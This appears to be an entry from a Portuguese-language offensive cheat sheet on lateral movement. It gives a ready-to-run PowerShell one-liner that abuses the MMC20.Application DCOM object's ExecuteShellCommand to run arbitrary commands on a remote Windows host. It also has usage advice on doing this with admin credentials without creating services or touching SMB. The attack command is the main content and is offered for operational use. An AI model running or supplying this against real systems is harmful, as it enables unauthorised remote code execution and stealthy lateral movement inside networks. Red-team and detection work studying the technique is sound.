Invoke-DCOM (MMC20)
$com = [Type]::GetTypeFromProgID("MMC20.Application","<target>") ; $obj = [System.Activator]::CreateInstance($com) ; $obj.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c <payload>","7")
Executa comandos em um host remoto abusando do objeto DCOM MMC20.Application (método ExecuteShellCommand), sem criar serviços ou arquivos.
Quando você tem credenciais administrativas e quer movimento lateral sem deixar serviços (como faz o PsExec) e sem depender de SMB. DCOM usa RPC (135) e permite execução remota direta do PowerShell.
Se o DCOM estiver restrito no host (DCOM Machine Launch Restrictions) ou o firewall bloquear a porta 135. Também não use se precisar de interatividade: não retorna saída diretamente, é necessário redirecionar para um arquivo.